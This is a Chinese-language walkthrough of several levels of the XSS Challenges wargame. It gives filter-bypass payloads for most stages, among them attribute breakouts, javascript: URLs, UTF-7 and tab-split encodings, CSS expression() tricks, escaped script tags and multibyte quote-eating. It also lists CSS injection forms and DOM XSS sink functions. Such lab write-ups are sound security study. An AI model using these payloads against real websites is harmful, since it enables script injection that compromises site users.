XSS Challenges部分题目总结
怎样进行Xss攻击
XSS Challenges:http://xss-quiz.int21h.jp/
这是一个日本的孩子写得xss测试关卡,一共19关。
第四关:http://xss-quiz.int21h.jp/stage_4.php?sid=04fb39847db7e3f24b1287a4be7e22b1ba79ec74
Hint: invisible input field
抓包发现有三个参数,通过测试发现前两个都被过滤了关键字符,而第三个没有过滤。
1"><img src=1 onerror= alert(document.domain)>
图片.png
第六关:http://xss-quiz.int21h.jp/stage-no6.php?sid=10284e95452262a58b13c86015336f4489b6152e
输入<>/"发现<>被过滤,可以在input中构造onxxx语句。
图片.png1" onclick="alert(document.domain)
图片.png
第八关:http://xss-quiz.int21h.jp/stage008.php?sid=8407d42ea5cf46b072f5a358abffa591a449a2ba
提示:the 'javascript' scheme.
<>"\都被过滤了,但是可以用JS的伪协议,点击链接弹窗
javascript:alert(document.domain)
图片.png
第九关:http://xss-quiz.int21h.jp/stage_09.php?sid=fcf3010be4306306e9668ee51b9d6916c0b3e129
提示:UTF-7 XSS
XSS事项 UTF-7: 消失的字符集
IE6/7 UTF7 XSS 漏洞攻击,这个攻击只对 IE6/IE7 起作用, 从 IE8 起微软已经修复了
"<>都被转义了,当然也不能用onmouseover和onclick,根据提示,用UTF-7编码解码工具,将" onmousemove="alert(document.domain)转为UTF-7编码:
p1=1%2bACI- onmouseover=%2bACI-alert(document.domain)%2bADsAIg- x=%2bACI-&charset=UTF-7
这个对使用的IE浏览器有一定的限制,大部分浏览器都已经修复了这个漏洞,但IE7还没有
第十一关:http://xss-quiz.int21h.jp/stage11th.php?sid=4a4c328baf358d9bf01befc79228e70d25549025
提示:s/script/xscript/ig;" and "s/on[a-z]+=/onxxx=/ig;" and "s/style=/stxxx=/ig;
没有过滤<>"/,
1,script会被替换为xscript
2,on事件会被替换为onxxx
3,style会被替换为stxxx
所以只能用a标签,<a href="javascript:alert(document.domain)">123</a>,可是还是有script,所以要将script中的某个字符转为unicode编码,或者可以插入
	
不可见字符。尝试用tab制表(%09),换行(%0a,%0d,%0a%0d)等符号都不行。
输入"><a href=javascri%09pt:alert(1)>test</a>,显示发现后面的那一段被截断了。 图片.png
%09也就是tab制表符,使用在单个标签之内,会被浏览器正确去除,而在跨标签的时候(也就是闭合前面原有标签,使用在构造者构造的新标签的时候)不会被正确去除。也仅仅是%09,其十进制编码和十六进制编码都不会受影响。后面测试发现%0a和%0d一样受到影响。
参考payload:
"><a href=javascri	pt:alert(document.domain)>test</a> //	 tab制表符html十进制编码
"><a href=javascri
pt:alert(document.domain)>test</a> //
是html5的换行符,:是冒号
HTML的16进制转义符 HTML Punctuation Special Characters
第十二关:http://xss-quiz.int21h.jp/stage_no012.php?sid=66a49c46b3d8e490003681f359c7b8b14ba174c8
提示:s/[\x00-\x20<>"']//g;
<>"被过滤,根据提示可以知道x00-,x20,<,>,",'都被过滤了,但是`还没被过滤,于是可以用`加上onclick,onmouseover,onfocus均可,还有一个前提是IE,只有IE才有这个特性
由于IE的特性,或者说浏览器竞争时代百家争鸣导致的结果,会把`解析为引号。
第十三关:http://xss-quiz.int21h.jp/stage13_0.php?sid=ea59af045ae260dd938d73d6cbbd1c92a6806e06
提示:style attribute6
css中的expression
支持者:IE5至IE7浏览器。expression这个语法只存在ie上。
xss:expr/*XSS*/ession(alert(document.domain));
还有一种:
background-color:#f00;background:url("javascript:alert(document.domain);");
现实环境中不可能有如此简单就能插入的地方
话说,现实中怎么利用
有2种注入:
(1)@import 和 expression
@import "http://web/xss.css"
@import 'javascript:alert("xss")'
body{xss:expression(alert('xss'))]
<img style="xss:expression(alert('xss'))">
(2)css代码中js,vs脚本
body{backgroud-image:url(javascript:alert('xss'))}
body{backgroud-image:url(vbscript:msgbox('xss'))}
第十五关:http://xss-quiz.int21h.jp/stage__15.php?sid=1e785fb96bdb203c00b034203ee574681d1b4403
提示:document.write();
输入<>"/发现<>"被过滤了
有几种绕过过滤的方法:
第一种:换成16进制编码\x3cscript\x3ealert(document.domain);\x3c/script\x3e
第二种:换成Unicode编码\u003cscript\u003ealert(document.domain);\u003c/script\u003e
第三种:换成十进制编码\74script\76alert(document.domain);\74/script\76
(两个\是因为过滤了单个)
能引起Dom XSS的入口函数总结
document.write()
document.writeln()
document.body.innerHtml
eval()
window.execScript()
window.setInterval()
window.setTimeout()
第十七关:http://xss-quiz.int21h.jp/stage-No17.php?sid=a207c91d7b4cb2634e277df104c853554347e8ca
提示:multi-byte character
Multi-Byte Character Set & Use Unicode Character Set
(浏览器版本问题不能成功,IE8已经修复)双引号是0x22,总体思路类似宽字节注入,这个技巧在sql注入中很常用,如%0c可以吃掉一个反斜杠,就是用一个特殊字节吃掉Name中的第二个",然后Name和E-mail的第一个"就闭合构成了value,然后插入onxxx,最后再吃掉最后一的"。
抓包payload
p1=1%A7&p2=+onmouseover%3Dalert%28document.domain%29%3B+%A7
第十八关:http://xss-quiz.int21h.jp/stage__No18.php?sid=b23d6719a639f5655a2966a2f5ade6ec86841851
提示:us-ascii high bit issue
这个源自于浏览器瞎解释,他会把一些8位的字符直接解释成7位ascii(漏洞已经在IE8中修补了)
就是说浏览器会忽略掉一些8位字符的第一位,如BC和<2进制的后7位相同,浏览器会把他当做BC,并不会过滤。(二进制和16进制可以和字符间相互转换)
参考文献
https://blog.csdn.net/emaste_r/article/details/16988167
https://www.cnblogs.com/sherlock17/p/6700430.html